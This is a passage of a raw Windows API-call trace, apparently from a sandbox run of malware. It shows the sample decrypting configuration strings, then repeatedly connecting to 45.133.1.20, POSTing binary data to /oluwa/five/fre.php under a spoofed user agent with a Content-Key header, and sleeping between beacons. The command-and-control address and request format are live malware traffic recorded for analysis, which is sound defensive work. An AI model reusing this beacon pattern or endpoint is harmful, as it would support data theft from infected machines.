[0172.600] GetProcessHeap () returned 0x6a0000 [0172.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0172.601] socket (af=2, type=1, protocol=6) returned 0x368 [0172.601] connect (s=0x368, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0172.631] FreeAddrInfoW (pAddrInfo=0x6b9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0172.631] GetProcessHeap () returned 0x6a0000 [0172.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0172.631] GetProcessHeap () returned 0x6a0000 [0172.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0172.632] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.634] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.634] GetProcessHeap () returned 0x6a0000 [0172.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0172.634] GetProcessHeap () returned 0x6a0000 [0172.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.634] GetProcessHeap () returned 0x6a0000 [0172.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0172.634] GetProcessHeap () returned 0x6a0000 [0172.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0172.635] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.636] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.636] GetProcessHeap () returned 0x6a0000 [0172.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0172.636] GetProcessHeap () returned 0x6a0000 [0172.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.637] send (s=0x368, buf=0x6bbd20*, len=242, flags=0) returned 242 [0172.637] send (s=0x368, buf=0x6bb998*, len=159, flags=0) returned 159 [0172.637] GetProcessHeap () returned 0x6a0000 [0172.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0172.637] recv (in: s=0x368, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0172.709] GetProcessHeap () returned 0x6a0000 [0172.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0172.710] GetProcessHeap () returned 0x6a0000 [0172.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0172.710] GetProcessHeap () returned 0x6a0000 [0172.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0172.710] GetProcessHeap () returned 0x6a0000 [0172.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0172.711] closesocket (s=0x368) returned 0 [0172.711] GetProcessHeap () returned 0x6a0000 [0172.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0172.711] GetProcessHeap () returned 0x6a0000 [0172.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.712] GetProcessHeap () returned 0x6a0000 [0172.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0172.712] GetProcessHeap () returned 0x6a0000 [0172.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0172.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xda0) returned 0x368 [0172.715] Sleep (dwMilliseconds=0xea60) [0172.716] GetProcessHeap () returned 0x6a0000 [0172.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0172.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.726] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0172.735] GetProcessHeap () returned 0x6a0000 [0172.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0172.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.749] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0172.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.750] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.752] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.752] GetProcessHeap () returned 0x6a0000 [0172.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0172.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.753] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0172.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.790] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0172.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.791] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0172.791] GetProcessHeap () returned 0x6a0000 [0172.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.792] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.794] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.795] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.796] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.797] GetProcessHeap () returned 0x6a0000 [0172.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0172.797] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0172.801] GetProcessHeap () returned 0x6a0000 [0172.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0172.801] GetProcessHeap () returned 0x6a0000 [0172.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0172.802] GetProcessHeap () returned 0x6a0000 [0172.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0172.802] GetProcessHeap () returned 0x6a0000 [0172.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0172.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.803] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0172.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0172.848] GetProcessHeap () returned 0x6a0000 [0172.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0172.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.849] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0172.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.851] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0172.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.852] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.852] GetProcessHeap () returned 0x6a0000 [0172.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0172.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.855] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0172.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.856] CryptDestroyKey (hKey=0x6ad020) returned 1 [0172.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0172.858] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0172.858] GetProcessHeap () returned 0x6a0000 [0172.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0172.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.859] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0172.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.860] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0172.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.861] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0172.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.863] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0172.863] GetProcessHeap () returned 0x6a0000 [0172.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0172.863] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0172.863] GetProcessHeap () returned 0x6a0000 [0172.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0172.863] socket (af=2, type=1, protocol=6) returned 0x36c [0172.863] connect (s=0x36c, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0172.893] FreeAddrInfoW (pAddrInfo=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0172.893] GetProcessHeap () returned 0x6a0000 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0172.893] GetProcessHeap () returned 0x6a0000 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0172.894] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.931] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.931] GetProcessHeap () returned 0x6a0000 [0172.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0172.931] GetProcessHeap () returned 0x6a0000 [0172.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.932] GetProcessHeap () returned 0x6a0000 [0172.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0172.932] GetProcessHeap () returned 0x6a0000 [0172.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0172.933] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0172.934] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.934] GetProcessHeap () returned 0x6a0000 [0172.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0172.934] GetProcessHeap () returned 0x6a0000 [0172.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0172.935] send (s=0x36c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0172.935] send (s=0x36c, buf=0x6bb998*, len=159, flags=0) returned 159 [0172.935] GetProcessHeap () returned 0x6a0000 [0172.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0172.935] recv (in: s=0x36c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0173.024] GetProcessHeap () returned 0x6a0000 [0173.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0173.025] GetProcessHeap () returned 0x6a0000 [0173.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0173.026] GetProcessHeap () returned 0x6a0000 [0173.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0173.026] GetProcessHeap () returned 0x6a0000 [0173.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0173.027] closesocket (s=0x36c) returned 0 [0173.027] GetProcessHeap () returned 0x6a0000 [0173.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0173.027] GetProcessHeap () returned 0x6a0000 [0173.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0173.028] GetProcessHeap () returned 0x6a0000 [0173.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0173.028] GetProcessHeap () returned 0x6a0000 [0173.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0173.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x530) returned 0x36c [0173.032] Sleep (dwMilliseconds=0xea60) [0173.033] GetProcessHeap () returned 0x6a0000 [0173.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0173.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0173.054] GetProcessHeap () returned 0x6a0000 [0173.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9998 [0173.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.057] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b9998, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0173.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.059] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.060] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.060] GetProcessHeap () returned 0x6a0000 [0173.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9998 | out: hHeap=0x6a0000) returned 1 [0173.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.066] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0173.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.067] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0173.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.068] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0173.068] GetProcessHeap () returned 0x6a0000 [0173.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0173.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.069] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.071] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.072] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.073] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.073] GetProcessHeap () returned 0x6a0000 [0173.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0173.073] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.073] GetProcessHeap () returned 0x6a0000 [0173.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0173.074] GetProcessHeap () returned 0x6a0000 [0173.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0173.074] GetProcessHeap () returned 0x6a0000 [0173.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0173.075] GetProcessHeap () returned 0x6a0000 [0173.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0173.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.097] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0173.105] GetProcessHeap () returned 0x6a0000 [0173.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0173.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.106] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0173.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.107] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.108] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.108] GetProcessHeap () returned 0x6a0000 [0173.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0173.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.110] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0173.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.111] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0173.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0173.112] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0173.112] GetProcessHeap () returned 0x6a0000 [0173.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0173.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.113] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0173.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.114] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0173.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.115] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0173.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.116] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0173.116] GetProcessHeap () returned 0x6a0000 [0173.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0173.117] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be808*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0173.117] GetProcessHeap () returned 0x6a0000 [0173.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0173.117] socket (af=2, type=1, protocol=6) returned 0x370 [0173.117] connect (s=0x370, name=0x6be808*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0173.144] FreeAddrInfoW (pAddrInfo=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be808*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0173.144] GetProcessHeap () returned 0x6a0000 [0173.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0173.144] GetProcessHeap () returned 0x6a0000 [0173.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0173.145] LoadLibraryW 